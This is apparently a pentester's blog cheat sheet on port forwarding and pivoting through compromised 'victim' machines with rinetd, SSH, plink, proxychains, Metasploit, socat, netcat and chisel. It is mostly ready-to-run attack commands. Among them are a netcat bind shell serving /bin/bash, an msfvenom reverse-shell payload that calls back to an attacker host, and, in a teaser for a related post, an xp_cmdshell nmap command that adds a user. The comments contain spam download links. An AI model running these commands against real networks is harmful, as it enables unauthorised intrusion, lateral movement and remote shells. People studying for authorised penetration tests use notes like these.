Skip to main content

Port Redirection and Pivoting



#Using SShuttle

sudo sshuttle -r user@10.10.10.10 192.168.1.0/24
 Port Forwarding: It is accepting traffic on a given ip address and redirecting
it to different ip and port

Inbound: traffic initiated from outside.

Outbound: traffic initiated from inside.
 
time nmap -p- portquiz.net | grep -i open 
   /Helps in checking outbound traffic Open POrts
 
Example:
-------- 
a windows XP machine has only 80 and 443 ports have outbound traffic allowed,
but we need to access a server using RDP(3389) in the same network. to access that we need to use port forwarding,
that menas we need an intermediate proxy --> which can be our kali linux machine.

on Kali: 
---------- Need to have a Public Address, IDK

vi /etc/rinetd.conf  Port Forwarding Utility Config
I
#bindaddress bindport  connect address  connect port
KALI_Public_IP  80  RDP_Server_address 3389
esc
:wq

/ we set it up to accept traffic from external interface on TCP port 80 and then
redirect to our remote windows server 3389

/etc/init.d/rinetd restart

Copy the KALI_IP (Proxy IP) and run it in windows RDP --> you can access it

RINETD server forwards incoming traffic to the windows 2003 remote desktop service

 
SSH = Tunnelling & Proxies:
-----------------------------

SSH local Port Forwarding:  ssh -L
---------------------------
allows us to connects a local port to a remote port over an encrypte SSH tunnel.


SSH Remote Port Forwarding:
------------------------------
allows us to tunnel a remote port to a local port over an encrypte SSH tunnel.
 
 ON VICTIM Machine:
====================
plink.exe is a SSH client for windows

netstat -an | find "LISTEN"  /RDP port is open
 / we would like to access RDP port on this internal non-routable machine
 /we can create a reverse ssh tunnel from the victim machine from our attacking box and tunnel out the remote desktop machine from the windows machine and make that port available on my attacking box.


Check for listening ports 
netstat -an | find "LISTEN"

From the victim Machine, do a reverse ssh tunnel

Remote Port Forwarding: 
--------------------------

on VICTIM Machine:
--------------------

plink -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward

plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389  


on KAlI:  netstat -antp | grep LISTEN
--------
/we can find 3390 Listening on Kali Machine

rdesktop 127.0.0.1:3390  /Login through RDP using the Remote Tunnel
DYNAMIC PORT FORWARDING:
---------------------------SOCKS4 PROXY

ON Kali:
--------

SSH -D 8080 root@VICTIM_IP  /Need pass --> we can login.. and port forwarding port 22 as well

netstat -atnp | grep 8080  /Check if the port is opened or not

nano /etc/proxychains.conf

socks4 127.0.0.1 8080

proxychains nmap -p 3389 -sT -Pn Victim_IP/24 --open /Nmap TCP connect Scan the Victim Ip for RDP
 /Proxychains take this traffic and redirects it to the DMZ network(in this case - example), this is slow 

proxychains netdiscover -r VICTIM_IP/24 

proxychains rdesktop IP_Found_from_Nmap
Port Forwarding using Metasploit:
-----------------------------------
get a meterpreter session first --> Note the IP address of the victim (10.7.0.22)

background
route add 10.7.0.0 255.255.255.0 1
portfwd add -l 445 -p 445 -r 10.7.0.22
Port Forwarding using SoCat:

Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine.

From Victim-1 machine: do a port scan as above and port forrward the required ports
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstart -plunt    /View the binded ports, we can see 8009 & 8080 in Victim_machine1


Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: 
socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 
Port Forwarding using Netcat

nc -l -p $localport -c "nc $remotehost $remoteport"

netcat -nvlp 9001       /Listen on port 9001

netcat -l -p 9001 -e /bin/bash  /Create a bash shell on port 9001

netcat -L KALI_IP:80 -p 8902            /Forward local por 9002 to remote port 80

netcat -L kali_IP:80 -p 9002 -x        /Port Forward Hex dump

Pivoting from GITHUB
PORT FORWARDING "port to port":

----MSF----
Most platforms

Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse


----SSH----
For Linux

~C "if you already have an SSH session"

-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to


-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it


For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali


Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1


---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine

On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS


---SOCAT----
For linux

Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443


---CHISEL----
Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:[YOUR LOCAL IP]:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>


Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80


Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003





----------------------------------------------------------------------------------------





DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf


----MSF----
Most platforms

Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)


----SSH----
For Linux

-D1080


---PLINK---
Just like SSH, on Windows

On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS


---CHISEL----
Most platforms

On Kali:
./chisel server -p 8000 -reverse

On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5

On Kali:
./chisel client 127.0.0.1:8001 socks




Depending on your scope, some of the machines may not be directly accessible. There are systems out there that are dual homed, which allow you to connect into an internal network. You will need to know some of these techniques in order to obtain access into there non-public networks:
Tools to help you with Port Forwarding and Pivoting:
Vulnerable systems to practice pivoting:

Comments

  1. Port Redirection And Pivoting >>>>> Download Now

    >>>>> Download Full

    Port Redirection And Pivoting >>>>> Download LINK

    >>>>> Download Now

    Port Redirection And Pivoting >>>>> Download Full

    >>>>> Download LINK LZ

    ReplyDelete

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in